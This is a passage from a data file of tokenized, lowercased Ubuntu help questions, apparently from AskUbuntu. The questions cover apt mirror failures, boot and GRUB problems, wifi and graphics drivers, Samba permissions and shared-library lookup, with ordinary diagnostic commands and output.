349922	ca n't connect to some ( not all ) repository servers	i have some head crunch issues with updating my ubuntu 12.04 server system . when i issue the following command ( as root ) : apt-get update ... nothing happens and after a while apt-get gives up with loads of errors like : w : failed to fetch http : //nl.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-en unable to connect to nl.archive.ubuntu.com : http : below a copy of the stdout . please note that i did n't wait for the command to finish and aborted it with ctrl-c to save some time root @ webserver : /var/log/apt # apt-get update 0 % [ connecting to nl.archive.ubuntu.com ( 213.136.29.218 ) ] ^c this is how my sources.list looks like : root @ webserver : /var/log/apt # cat /etc/apt/sources.list # # # # # # ubuntu main repos deb http : //nl.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise main restricted # # # # # # ubuntu update repos deb http : //nl.archive.ubuntu.com/ubuntu/ precise-security main restricted deb http : //nl.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-security main restricted deb-src http : //nl.archive.ubuntu.com/ubuntu/ precise-updates main restricted my /etc/apt.apt.conf is empty and no proxy is in use root @ webserver : /var/log/apt # cat /etc/apt/apt.conf root @ webserver : /var/log/apt # echo $ http_proxy root @ web-octoplus01 : /var/log/apt # echo $ http_proxy root @ web-octoplus01 : /var/log/apt # using the us mirrors ( http : //us.archive.ubuntu.com ) gives the same result . special with the us mirrors is that every third try it suddenly works ! ( only the 91.189.91.14 address works , the rest results in the same errors ) root @ web-octoplus01 : /var/log/apt # host us.archive.ubuntu.com us.archive.ubuntu.com has address 91.189.91.14 us.archive.ubuntu.com has address 91.189.91.15 us.archive.ubuntu.com has address 91.189.91.13 us.archive.ubuntu.com has ipv6 address 2001:67c:1562 : :15 us.archive.ubuntu.com has ipv6 address 2001:67c:1562 : :13 us.archive.ubuntu.com has ipv6 address 2001:67c:1562 : :14 can it be that my server is on some inconsistent black-list at ubuntu ? what do i not see ?
349925	kubuntu and pda net bluetooth dun	i can not find information regarding how to setup bluetooth dun using pda net on my samsung galaxy s4 ( at & t ) for kubuntu 13.04 x86_64 . i just need a definitive answer and i 'm pretty good with linux but i 'm still learning . also on a side not what is a great website to learn more about linux and the commands and structure of the file system . i hate windows i only use linux now and i want to know as much about linux as i do windows .
349926	upgrading problem black screen	i am new to ubuntu i now have ubuntu 12.04 and i want to upgrade them to 12.10 and then to 13.04 . so i follow some steps i installed 12.10 but when i reboot it i could n't login and all i get was a black screen and nothing else . i pressed alt+ctr+f1 i logged in and i could use the terminal . so i reinstall 12.04 from usb and i need to know what to do to upgrade them successfully ... from a quick search i think that this is a problem from graphics card . i have ati radeon hd 5500 and also when i opened them i could see the purple screen and then it turned black and i could n't do anything . sorry for my really bad english too .
349929	vi editor in ubuntu 12.4.2 ( lts )	i have recently got a copy of ubuntu 12.04.2 ( lts ) , but unfortunately problem occurs while trying vi editor . i have heard that vim ( vi improved ) should be installed in order to use vi in this version . if this is the case then is there any way to install it offline ? is there any alternate editor that can be used to write shell scripts or c source programs .
349933	where are my local webserver pages ?	my webserver is running - where is this page coming from ? i checked a few places in /etc and /var but did n't see it .
349935	how to make multimedia keys work on dell studio 1555	all my function keys work fine except the play/pause , previous and next keys.i have been looking for a solution but its not working .
349939	touchpad jerks on tap , makes double clicking a pain	i have a question about the touchpad in ubuntu 13.04 on my hp envy 3040nr . when i go to click tap ( i do n't like having to physically press the touchpad button ) , the cursor jerks maybe five or ten pixels in a random direction . or , when i simply move the cursor to a location , when i release my finger from the touchpad , the cursor jumps a few pixels in a random direction . this is a pain when i 'm trying to resize windows or click small buttons especially , as a ) it makes it difficult to even get on the very edge of the window to change the window size and b ) even if i do , the moment i try to tap click , the cursor jumps away . i know that in windows , the touchpad drivers have some `` forgiveness '' towards very slight movement . i do n't know how to emulate that on ubuntu . thanks !
349944	selecting text problem	hello i 'm new with ubuntu but i have this problem that drives my nuts if i select some text ( does n't matter in what program ) the highlight just keep jumping at the end or on some random word in the line
349945	ubuntu does n't open in graphic mode	my ubuntu 12.04 lts was working fine in gnome mode , but i tried to login in user-defined mode . it worked fine , but now , when i try to login in ubuntu mode or any other mode ( gnome , gnome-classic , etc . ) , it always opens in user-defined mode .
349946	how to run c # forms application upon boot on system with ubuntu server 12.04	i am trying to run a c # windows form application on my server which has ubuntu server 12.04 . i have installed mono on the server already but am not sure how to move forward . should i just build/publish my code in windows , put it on a usb and transfer it to the ubuntu machine ? or is there another procedure . my c # forms application was developed using visual studio 2012 and i have installed mono jit compiler version 2.10.8.1 . please advice me if i need to update my version of mono to be compatible with the c # forms application .
349952	ubuntu minimal + wicd help	so i installed ubuntu minimal , xfce4 , and just a few applications . i used an ethernet cable to do the install and worked off the ethernet . however , now i need to connect to a wifi network . i tried just installing wicd , and towards the end i get the [ starting wicd daemon : fail ] . something like that , i ca n't remember . when i install network-manager , all the options are completely greyed out . i know that i can use command line to connect to networks , but i prefer to use a gui for something like that . any ideas anyone ?
349953	wifi usb adapter atheros 9170 chipset not working on ubuntu 13.04	i 'm new to ubuntu and linux . have just changed my os from windows 7 to ubuntu . i 'm running a hp/compaq 6910p laptop . my icidu 300n 802.11n adapter stopped to work . it contains a atheros ar9170 chipset . i have read many answers in this and other forums but none of them quite gave me the answers . can anyone out there give me some good advice ? ? lshw shows : warning : you should run this program as super-user . *-network description : ethernet interface product : 82566mm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 03 serial : 00:1b:38 : eb:45:38 size : 1gbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.1.4-k duplex=full firmware=0.3-0 ip=192.168.0.122 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:43 memory : e4620000-e463ffff memory : e4640000-e4640fff ioport:4060 ( size=32 ) *-network disabled description : wireless interface product : pro/wireless 4965 ag or agn [ kedron ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:10:00.0 logical name : wlan1 version : 61 serial : 00:1d : e0:67 : f5:3b width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl4965 driverversion=3.8.0-30-generic firmware=228.61.2.24 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:48 memory : e4000000-e4001fff *-network disabled description : wireless interface physical id : 1 bus info : usb @ 2:1 logical name : wlan0 serial : 6c : fd : b9:07:0e : c7 capabilities : ethernet physical wireless configuration : broadcast=yes driver=carl9170 driverversion=3.8.0-30-generic firmware=1.9.6 link=no multicast=yes wireless=ieee 802.11bgn lsusb shows : bus 002 device 002 : id 0cf3:1002 atheros communications , inc. tp-link tl-wn821n v2 802.11n [ atheros ar9170 ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
349956	how can i create one more partition ?	sda1 - > windows xp sda2 - > windows 7 sda3 - > data partition i have created 4 primary partitions , i have 7xx gb left , how can i create one more partition ?
349957	what version of ubuntu is to be installed in dell-mini-10 ?	i am using dell ubuntu mini 10 version of ubuntu . the problem is : i tried both 12.04 and 13.04 , but both are extremely slow on this laptop.so i am now running 11.04 which is near it 's end of life and will give no further support . so what should i do now ? is there any better option than using 11.04 ?
349959	link for purchase a pack of 10 install cds of ubuntu 12.04 64-bit ?	i can see the link to purchase a pack of ubuntu 12.04 32-bits cds on shop.canonical.com , but i have n't found the link for the 64-bit install cds . where can i find it ?
349960	how to print pdf files with crop marks and color scale ?	is there any tool or program for ubuntu that is capable to print crop marks , colour scales and register crosses for pdf-files . i have an pdf created with latex , that i have to print with all those marks . any idea ?
349962	how do run a program at startup ?	i 'm trying to make firefox run when users log on ( and go to a specific page if possible ) , but i 'm not sure how . using ubuntu 13.04 , i can enter the startup applications preferences ( by pressing alt+f2 and typing gnome-session-properties ) . however , after clicking add when browsing for a command , i 'm a bit stumped . where would i need to point to in order to start firefox ? i did try putting just http : //www.mywebsite.com/ , but that did nothing . thanks .
349969	cooling fan goes crazy at every warm boot . any setting possibilities ?	i 'm new to ubuntu and linux . i just installed 13.04 on hp/compaq 6910p laptop . erased windows7 . when i do a cold boot the fan runs normally but when the screen has been down and opened again , it run like in a dessert . any good ideas for settings ? thanks
349970	youtube client that still works ?	i 've tried minitube and totem , both of them are broken , which one is n't ? there is an old machine on which flash is too laggy . i hope that native client will fix that . and it needs to be able to search videos by itself , no need for instructions on how to download videos separately or open videos in players just with links from browser .
349978	ubuntu 12.04 lts crashed . how to access the files in home folder ?	i am new with ubuntu . i had installed 12.04 lts 64 bit version . i had installed all the important updates it showed . later on i selected some files manually in the recommended updates section . it was about 13-14mb . by default it showed some 140mb files . so i downloaded and installed it and then restarted my laptop and then the grub came . i selected ubuntu and then it shows a blank screen . i went to the terminal using f1 key and tried commands like startx , then root startxand then sudo startx but nothing works . i do n't know what all i installed exactly . another difference i observed is previously it used to show ubuntu with linux 3.0.0-23 now its showing ubuntu 3.0.0-40 at the grub . also i have my ubuntu password protected . what should i do ? i have got files inside ubuntu and do not have its backup . how to recover them ?
349979	transferring installed applications from one computer to another in ubuntu	i 'm sorry , this is obviously a duplicate . but other posts were not helpful . i have ubuntu 13.04 running on my laptop . my friend has vlc in his ubuntu 12.04 . and i want to copy vlc to my laptop . i have no ubuntu-restricted-extras installed . and my friends /var/cache/apt/archives folder is empty . maybe it is because he installed vlc using software center . so is there any way to copy vlc to my laptop from my friends laptop , so that i can watch videos too ? : ) ( internet cost is expensive here : | ) thanks for your help in advance .
349982	i ran tar command with the -v switch , but got no output , why ?	after running : tar -xvf directory.tar i do n't get any error but i ca n't see the output . does anyone can help me ?
349984	website access only with ip	i recently installed linaro ubuntu 12.04 on my cubie development board and i can access websites only with ip adresses , for example i can access google with 74.125.224.72 . i also can ping only ip adresses . my dns adresses are set to google dns 8.8.8.8 and 8.8.4.4 in router settings . on ubuntu i have set to ignore ipv6 and ipv4 to automatic ( dhcp ) addresses only and specified google dns there also . my /etc/resolv.conf and hosts files are empty . maybe this is a problem ? waiting for your help . edit : i found a solution . i just added these lines to my /etc/resolv.conf file : nameserver 192.168.1.254 nameserver 208.67.222.222 nameserver 208.67.220.220 first ip is my router 's address and last two are opendns ip addresses .
349987	do i have to move swap partition to the right side ?	according to this topic i just expand my sda4 to include unallocated space , my question is after create 2 new partitions sda7 , sda8 , do i need to move the swap partition to the most right of the disk ? ( i really do n't know this , i saw a clip on youtube which moving the swap partition to the right side ) thanks .
349989	ubuntu server 12.04 black screen after grub	i recently got my ubuntu server 12.04 box up and running with software raid . i have 2x3tb drives in raid0 . ubuntu s installed on a 1tb drive that i had lying around . i 've had to install a few times now , because i always have this problem . after installing , it boots up fine , but after installing some packages and getting samba shares working , the next time i reboot , i get grub , select the ubuntu server install , and it immediately goes to a black screen , no cursor , no nothing . so far , i haven'f figured out how to get out of it or open a terminal . any help would be appreciated !
349995	find usb device 's directory /sys/bus/usb/devices/ using idvendor/idproduct	i 'm trying to make a script that takes the product and vendor id printed by using lsusb , then checking against this id to find the usb device 's directory in /sys/bus/usb/devices . i initially thought the bus and device number printed by lsusb would point to the appropriate folder . for example , if bus = 002 and device = 002 , the usb 's directory would be /usb/devices/2-2 . unfortunately , this turned out to not be the case . i can manually find the appropriate folder using this command i found in another thread : for x in /sys/bus/usb/devices/* ; do echo `` $ x '' cat `` $ x/idvendor '' 2 > /dev/null cat `` $ x/idproduct '' 2 > /dev/null echo done however , i need a script that can automate finding this folder .
349996	ubuntu 13.04 install appears to have stalled	my ubuntu install seems to have stalled on the welcome to ubuntu 13.04 screen although i can scroll through the new features and buttons in top right of screen functioning . am i missing something , sorry it may just be something i am overlooking . tia , kate .
349998	mupen64plus ( 64 bit version from repo ) too slow	i 'm using ubuntu 12.04 lts 64 bit with unity 2d using compiz on a laptop ( dual core amd 64 bit turion 2.1ghz ) with a ati radeon x1250 . i did not install the ati drivers because there are none that work for this card past ubuntu 9.6 from what i 've been told . okay , after much effort to get mupen64plus installed and configure m64py ( version 0.1.0 works with this but you have to configure path data for the 64 bit version manually to library /usr/lib/x86_64-linux-gnu/libmupen64plus.so.2 , plugins /usr/lib/x86_64-linux-gnu/mupen64plus , data /usr/share/mupen64plus . ) i am only getting 19 fps and can only use the glide64 video plugin ( the other video plugins distort the graphics . ) the laptop is fast enough to run pcsx , epsxe and yabause without any slow down and i do n't get the graphic distortion from the opengl plugins for those emus . i also have wine installed and tried using project64 ( 32 bit ) and i get the same frame rate but with audio issues ( it stops and goes because the audio synchs to the frame rate of the emu ) and can only use the direct draw plugin for it ( but more stuff works in it . ) so , if anybody knows what i 'm doing wrong and how to fix this then please help . note : i can only use the 64 bit drivers so the 32 bit drivers available online wo n't even be recognized by mupen64plus .
349999	kde not seeing usb devices anymore	a recent update has rendered my usb devises unusable in kde . the device notifier does n't notice when they are connected . if i run lsusb the device is certainly there . in syslog i can also see the connection and information , the devices do appear available , just not to kde . perhaps this relates to some change in qt libraries , as i also had weird errors with rendering in some places .
350000	how to download app from apps.ubuntu.com ?	when i tried to click on this button to download app using any web browsers e.g . firefox , chrome . i got this windows popped up . what application i need to choose so i can install apps using web browser ? thanks .
350003	how to write a custom file of grub in a rigth file type in order to set a superuser password ?	i am trying to set a superuser password in gnu/grub 2 , the default grub after installing ubuntu 13.04 . i have read the ubuntu guide for grub and i think i know how to write the lines of code despite the fact that the grub files of ubuntu are incredibly complicated . i have copied the 40_custom file from /etc/grub.d to the desktop to change it and get it back to /etc/grub.d as 42_cutom later . i am trying to edit the file with gedit , but it seems that i do not save the file in the right format . i have tried saving it as a no extension file and later changing its properties to let ubuntu execute it , which does not work and the icon is different from the original one . i have also tried saving it as a .sh file and neither does it . how should i save the modified file ? ps : i am sorry for my bad english and the poor description . now i am using windows and i do not remember the details very well .
350004	how do i monitor startup disk usage ?	when i log in to my user session in ubuntu it is being very slow . the cpu remains relatively low but the led of disk usage is running wild . how can i trace which applications are making the most intensive usage of the disk in the start up process ?
350009	bash to monitor sessions	i am looking to write a bash to monitor how long sessions of the given username have been logged on . here is what i have so far . i want it to work as any user ( lastlog awk ' { print $ 1 } ' | tail -n +2 ) do now= $ ( date + % s ) usr= $ ( lastlog | awk ' ( print $ 1 , $ 5 , $ 6 , $ 9 ) ' | grep $ u ) usrdate= $ ( echo $ usr | cut -d '' : '' -f2 ) ( ( usrdate = $ ( date -- date `` '' $ usrdate '' + % s ) / 86400 ) ) ( ( now = now / 86400 ) ) ( ( days = now - usrdate ) ) echo `` the user $ u : logged in $ days days ago '' done
350010	java installation in ubuntu for topcoder	can someone help me with an issue ? i want to do topcoderďťż . it needs a java applet . i 'm new to ubuntu , have the 13.04 version and have no idea how to get java installed and which version of it should i get for the applet ? please suggest what to do . thanks in advance .
350020	how to complete uninstall git from ubuntu desktop 12.04 ?	about 6 months ago i tried installing git and ended up botching the install/configuration . i was then called away to another project and no longer needed to use git . i 'm back to the project now , and would like to reinstall git completely from scratch . so i ask : how do i completely uninstall git from my ubuntu desktop 12.04 machine ? when i run which git i get : /usr/bin/git thanks in advance !
350025	thinkpad w530 , can not save to windows partition	i recently purchased a thinkpad w530 laptop from lenovo with windows 7 on it . i installed lubuntu 13.04 on it , and then mounted my os partition in lubuntu 13.04 . i have found that whenever i tried to save a file into this partition ( any file , any directory ) , lubuntu seems to transfer or save the files just fine , and i am able to edit them without any apparent errors in lubuntu . however , when i shutdown and reboot into windows , not only are those files gone ( not even hidden , actually gone ) but when i shutdown and reboot back into lubuntu the files are gone there as well . in addition , when i run a chkdsk in windows , it shows that the files i transferred are actually corrupted and must be deleted . i should mention that i had also tried this same test by removing lubuntu and using xubuntu , with the same results . i have installed ubuntu , lubuntu , suse , and other distros on my previous personal computers without any such problems ever arising . so , i am very confused by this behavior . does anyone have any advice regarding this problem , or has anyone solved this problem on their own machines ?
350026	why there is a delay between when a key is pressed and when it is accepted ?	this is one of the wackiest and weirdest problems i have ever encountered . my keyboard was working absolutely fine untill yesterday on ubuntu 13.04 . however , when i boot to ubuntu today , i suddenly find that all the keys work , but i have to press and keep on holding them for about a second for them to work . this behavior is true for all the keys except for num lock , caps lock and scroll lock keys , the indicator for them on my keyboard lights up as soon as i press those keys . the keyboard works fine at the login screen where i put my password . the keyboard also works normally if i use the guest session instead of my normal user account . i have not done any key-remappings and using the standard english ( us ) keyboard layout . i have fiddled around with the settings for keyboard in system settings , but to no avail . i have windows 7 as dual-boot and the keyboard works perfectly well on it . why am i facing such a behavior and how to normalize this ? ps : using logitech classic keyboard k100 ( usb model ) .
350027	why ubuntu 12.10 does n't recognize my graphic card ?	in settings , ubuntu says my graphic card is unknown : the command lspci | grep vga gives me this : why ?
350028	screen shuts off when using proprietary nvidia drivers	as soon as i install the proprietary nvidia driver on my laptop ( even after a fresh kubuntu install ) , i start to experience random screen failures , that is , the screen suddenly shuts off , the backlight is still on , but the display is black , and trying to switch tty changes nothing . having skimmed through xorg.log , i could n't find any error or warning that could be related ( but then , i am no expert ) , but there are some 200 null ( ^ @ ) chars at the end , and i do n't know if it is normal . i have no such problem when using nouveau , so i suspect it is a driver issue , not a physical one . i am using nvidia-current ( so 304.88 , but the issue occurs with every driver available in jockey , that is another 304 and two 319 ) on kubuntu saucy ( but the issue occurs on raring too ) with a geforce 8800m gtx . what should i do to make the proprietary drivers work ?
350031	grub , ubuntu and linux mint , impossible ubuntu booting	ok , this problem consists that when i boot my computer , and then grub shows up , i have these options : ( note : my os 's are windows 8 , ubuntu , linux mint and pear 8 os ) ( i asked this here since the main problem is caused by grub ) linux mint os boot linux mint os recovery boot memtest x86 memtest x86 ( i do n't really remember what this boot option really said ) windows 8 ( loader ) /dev/sda1 < this one is bugged , when i press enter , it gets stuck on a blinking `` - '' . windows 8 ( loader ) /dev/sda2 pear os 8 8.0.0 when i select windows 8 ( loader ) /dev/sda2 , it boots normally and sends me to the windows 8 os selection , windows 8 and ubuntu , when i hit ubuntu it restarts my computer , it should send me to an ubuntu grub ( i think , cause it used to send me to a purple grub to boot ubuntu ) , but it just sends me back as if nothing happened , anyways , long story short ; i have deducted that linux mint is somehow bugging ubuntu , because , since it 's installation this started happened , i actually have n't tried uninstalling it to then boot ubuntu but i have reinstalled it . summary : when i boot , then i click windows 8 loader , then i click ubuntu , the computer restarts and goes back to the main grub screen instead of loading ubuntu , making it impossible to access . note : i posted this on askubuntu and superuser since i do n't really know where it goes , just please help me , i really need help with this d :
350032	call a modem using ubuntu and a iphone	i 'm having a pc with ubuntu , and want to call a machine with a modem on it . the things i have in my work is the following , my pc with ubuntu , my iphone . is it possible to call ( in this case a weather station with a modem , with a gsm sim-card ) this station with my pc , using my iphone to call a phone number ? now i 'm using gtkterm and a serial cable , direct into the weather station , but i want to call the modem who 's connected to the station ( so i could program from distance ) do anybody know a good solution to this ?
350033	zsh up-line-or-history does not work in gnome-terminal and tmux	i use ubuntu 13.04 , zsh with oh-my-zsh and up-line-or-history is bind to up arrow ( default settings of oh-my-zsh ) . but this work only in urxvt . i try to use debian_prevent_keyboard_changes in my zshrc , but this does not help .
350035	is there a juju postgis charm out there ?	i wonder if somebody has created if someone knows if exists a postgis juju charm out there . any help is very welcome .
350036	light-weight web development editor	i have just started using ubuntu and i want to continue developing my website however i realised notepad++ is n't linux compatible and i was wondering is there something similar to notepadd++ that does n't have that many features but has syntax highlighting . i know ubuntu comes with one but i do n't like the look and indenting of the text and how it responds . thank to anyone who can help .
350041	lubuntu 12.10 arm , how to get qemu 's glibc for x86_64 running ?	so i have a machine with lubuntu 12.10 that runs on a arm processor architecture . ( if it is of any help : it 's an ac100 toshiba netbook , i got lubuntu on it using this : https : //wiki.ubuntu.com/arm/tegra/ac100 ) now i need to get eiffelstudio on it , which comes in either 32-bit or 64-bit x86 binaries , so i decided to install qemu for that purpose . i tried sudo qemu-x86_64 ./binary_file on the 64-bit binary and got /lib64/ld-linux-x86-64.so.2 : no such file or directory ( the same with the respective ld-linux file on the 32-but binary with qemu-i386 ) after a little research i found that i apparently needed some glibc-package , however even after installing libc6 and thelike ( libc6-dev , etc ... ) using apt-get and getting the build-essential package i still have n't got any /lib64/ld-linux-x86-64.so.2 . the qemu docs say i need some qemu-runtime-i386-xxx-.tar.gz for it to work ( that one 's for 32-bit , but i guess there should be one for 64-bit ) , but the qemu page does n't seem to have such a tar file , hour long research on google has only gotten me one broken link to some french site . so far i 've concluded that the reason for this problem is probably that the required glibc components simply do n't exist for arm , at least not in any apt-get package , so i was wondering if there was any way to get gemu to emulate x86_64 or at least i386 correctly on my arm lubuntu . this is really important to me , i need to use the netbook for my lectures in university , and that lecture is basically all about eiffel . thanks in advance ; )
350049	bcm 4313 issue with asus 1015e , brcmsmac , ubuntu 13.04	i 've been hunting around here for about two weeks trying solutions to other people 's bcm4313 problems , but none have worked . i was able to solve problems in 12.04 and 12.10 using solutions available through these forums , but in 13.04 nothing has so far worked . i 've succeeded in getting back to a point with the brcmsmac driver activated where `` wifi is disabled by hardware switch '' is my problem . i 'm including lspci and lsmod results here , and also am including the output results from wild man 's wireless info script . lspci -nnk | grep 4313 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) lsmod brcmsmac results from the wireless info script : http : //pastebin.com/f6ptr2dd i have also tried the bcmwl-kernel-source package , but when using it have a different problem . i am happy/willing to try any suggestion and post results . please advise . thank you .
350050	camera not working but camera light is on when trying to use it	i ca n't use my camera in google hangout , i can share desktop in google hangout and it works fine but camera never works , it looks like this i have also tried using cheese and i also just get a back screen . the light beside my camera is on when using google hangout or cheese . does anyone know how to fix this ?
350053	tomcat installation startup.sh not working	so i 've followed the list of steps on : https : //www.digitalocean.com/community/articles/how-to-install-apache-tomcat-on-ubuntu-12-04 . when i try to run the startup script , i get this message : $ catalina_home/bin/startup.sh using catalina_base : /usr/share/tomcat7 using catalina_home : /usr/share/tomcat7 using catalina_tmpdir : /usr/share/tomcat7/temp using jre_home : /usr/lib/jvm/default-java using classpath : /usr/share/tomcat7/bin/bootstrap.jar : /usr/share/tomcat7/bin/tomcat-juli.jar touch : can not touch `/usr/share/tomcat7/logs/catalina.out ' : no such file or directory /usr/share/tomcat7/bin/catalina.sh : 389 : /usr/share/tomcat7/bin/catalina.sh : can not create /usr/share/tomcat7/logs/catalina.out : directory nonexistent what am i supposed to do to fix this ? and am i supposed to modify the catalina_base variable ?
350054	installing ub 13.04 and win 7 boot loader issues	i have a computer with a vertex 3 ssd which i have windows 7 64 hp installed on . i also have a second maxtor hdd which i have installed ubuntu 13.04 onto today . because i was afraid of mucking up my other hdds when i was formatting for ubuntu i removed them from my computer , just leaving the maxtor which i installed ubuntu on . now when i have all the drives installed and boot the computer it just loads windows , wit no option for ubuntu or windows . i know you 're meant to install ubuntu after windows , but with no windows os plugged in while i installed ubuntu i think it only sees itself when i boot my computer . i want a way to pick the os at start up . if anyone can make sense of what i 've just said and can help that would be great ! regards .
350056	change guest session unity launcher size ?	i was wondering if it is possible to change the default size of the launcher during guest sessions ? it is rather large , and a little bulky ( opinion ) , and i was wondering if i could change it so every guest session would have a smaller ( example 32px or whatever ) launcher size ? ( ubuntu 12.04 and newer ) thank you for your time and ansers .
350058	pam radius module access-reject	i am trying to set up an ubuntu server that my users will connect to . i already have a radius server running on a windows box , and i would like for connections to this ubuntu box to authenticate to that windows box . i followed this : http : //community.spiceworks.com/how_to/show/36079-how-to-install-pam-radius-on-ubuntu-server however , i am still not able to do the authentication . from the ubuntu box , i tried to test with : $ echo `` user-name=test , password=password1 '' | radclient 10.22.22.22 auth test1234 -x sending access-request of id 74 to 10.22.22.22 port 1812 user-name = `` test '' password = `` password1 '' rad_recv : access-reject packet from host 10.22.22.22 port 1812 , id=74 , length=20 so as you can see , i got access-reject . i more or less see the same thing in /var/log/auth.log where it says that none of the radius servers respond . what is going wrong ?
350063	button 1 ( left button ) not working on touchpad	i installed 13.04 onto my hp tx2113cl and it seemed to install fine . during the trial when booted from the usb everything worked great , but once i installed the left click touchpad stopped working . it does n't work with a mouse , either . the machine still has windows 7 os installed on another partition and everything works fine there . i browsed the forum and tried some things to no avail . xinput -list shows the synaptic touchpad , so the drivers installed fine . xinput -test shows that button 1 works when depressed and released . xinput -get-button-map shows the touchpad buttons are mapped 1 2 3 4 ... 12 . the right button works fine .
350064	kde ignoring changes made to monitor position/rotation	i 've been having all sorts of issues with xorg , so this may have been self inflicted . i currently have two monitors , a 1280x1024 ( we 'll call it a ) and a 1600x1200 ( b ) that is rotated 90 to the right ( portrait mode ) . a is physically left of b . currently , both monitors display the same image . when i try to either shift b to the right or rotate it in `` size and orientation - kde control module '' and hit `` apply '' , the changes that i made are reverted back to what they were . the only thing that i 've been able to do successfully is to change the resolution of b to 1600x1200 but that just makes the activity bar disappear from a ( logically below it 's visible display ) . any help would be appreciated . i 'm running ubuntu 12.04 with kde . and all the problems started when i upgraded my kernel to 3.10 . this is what my desktop currently looks like , and this is what i want my desktop to look like , any ideas why my settings are not being saved ?
350065	remove disks or other media during installation	im trying to install 12.04 on my lenovo t60 via a usb stick . i downloaded the latest iso , loaded it on the usb stick after i formatted it and now im trying to boot from it to start the installer . after changing the boot priority to boot off usb-hdd i get the message remove disks or other media /n press any key to restart ive checked my startup boot menu and removed everything except for the usb-hdd and i still get this message . i still have windows installed on the hard drive and was planning on formatting it during the installation- i 'm not sure maybe this is getting in the way . any suggestions would be helpful . thanks !
350068	where does ubuntu look for shared libraries ?	when i run a process that links to a shared library at runtime ( linked when the process starts , not linked later with dlload ( ) ) , where does it look for that shared library ( .so ) file other than ld_library_path ? background : i have some c++ code that i wrote that uses a particular third-party library . i have installed the library and compiled my code on two different platforms , both ubuntu but different versions , and different versions of gcc as well . the library was compiled and installed from source , and is located in /usr/local/lib on both platforms . when i compile my code , i link with the pkg-config -- libs parameters for the third-party library and i 've verified that pkg-config -- libs returns the exact same thing on both platforms . my code compiles successfully on both platforms , and ld_library_path is not defined ( or defined as empty : `` '' ) on both platforms . however , when i run it on one platoform it works fine , and on the other i get this error : error while loading shared libraries : libthrift-0.9.0.so : can not open shared object file : no such file or directory funnily enough , the ones that does n't work is the newer version of ubuntu and gcc . : / so i 'm trying to figure out how the working one is able to locate the library , so that i can make the broken one locate the library in the same way . ( i.e. , without setting ld_library_path ) update : here 's my output from cat /etc/ld.so.conf.d/* ... on the working ( older ) system : /usr/lib/mesa /usr/lib32/mesa /usr/lib/alsa-lib # libc default configuration /usr/local/lib # multiarch support /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu ... on the broken ( newer ) system : # libc default configuration /usr/local/lib # multiarch support /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu/mesa
350071	samba question : share = user	i am running ubuntu 13.04 and windows xp . i am a samba newbie but was able to set this up on ubuntu following the instructions posted here https : //help.ubuntu.com/13.04/serverguide/samba-fileserver.html my question is that although i can copy a word document to the share from linux , when i edit it in word on windows i can not save and overwrite the file . it says the file is read only . i have to save a copy and then do a move of the file on the linux system . i tried changing the perms of the file to 777 on the linux side but this did n't fix it so i am thinking it is a perms at the user level . does anyone know off the top of their head ? i currently have security = user in my smb.conf file . when copying a file from linux to the share it has my user name on it . when creating a file from windows to the share it has nobody nogroup on the file . the good news is both linux and windows see the same files and i can open all the files put on the share in windows i just ca n't overwrite them with edits ( word 2007 files specifically ) . any help on the setting to fix this is appreciated . samba details [ share ] comment = unbuntu file share path = /srv/samba/share browseable = yes guest ok = yes read only = no create mask = 0775 permissions of all the directories for /srv/samba/share bjackfly @ bigjackfly : ~ $ ls -ltr | grep srv drwxr-xr-x 3 root root 4096 sep 25 14:05 srv bjackfly @ bigjackfly : ~ $ ls -ltr /srv/ | grep samba drwxr-xr-x 3 root root 4096 sep 25 14:05 samba bjackfly @ bigjackfly : ~ $ ls -ltr /srv/samba/ | grep share drwxrwxrwx 2 nobody nogroup 4096 sep 25 17:25 share
350072	how to log in to skype via command line	i am aware of how to install skype via command line - by adding the canonical partner repo and using apt-get . however , how can i log in via the command line ? there are two reasons i want to do this . first is down to this being ubuntu server with no connected monitor and no desktop window manager running ( and i do n't want one , this is running on aws micro ) . second is to automate login upon boot up . the end goal here is to build a skype bot using skype4py ( a python lib ) . thanks in advance
350073	grub rescue with non existing ubuntu filesystem	i 'm a newbie ( i 'm a programmer but i 'm just trying to work with ubuntu ! ) and i 've got a very seriuos situation ... i explain myself : i have an asus n550jv and it has efi boot ... ..i decided to install ubuntu next to windows 8 ( i have a partition with windows 8 and some other partitions that windows 8 needs to work fine + a rescue partition ) so i followed the official guide ... .since that everything fine ... .one day i decided to remove ubuntu and leave just windows 8 , so i went on windows and as i always do , i deleted the partition ( and the related so also the swap ) on windows ... .now when i enter in bios there is yet a boot option called `` ubuntu '' that is referred to the hard disk and that does n't work ( i 've deleted the partition so when i ty to use that there is as `` usual error : no such partition . grub rescue > '' ) ... ..i tried everything to remove it ( from bios i entered `` remove option '' , from windows i used easybcd 2.2 ... . ) ; one more thing : i ca n't use anymore the usb live/cd live because the boot does n't recognize them as before ( when i first followed the guide i disabled the secure boot and then i could try ubuntu with uefi mode ; right now i can use the usb live only if i enter in legacy mode , but obiuvsly all the kind of operation that involve uefi are n't good because i started ubuntu in legacy 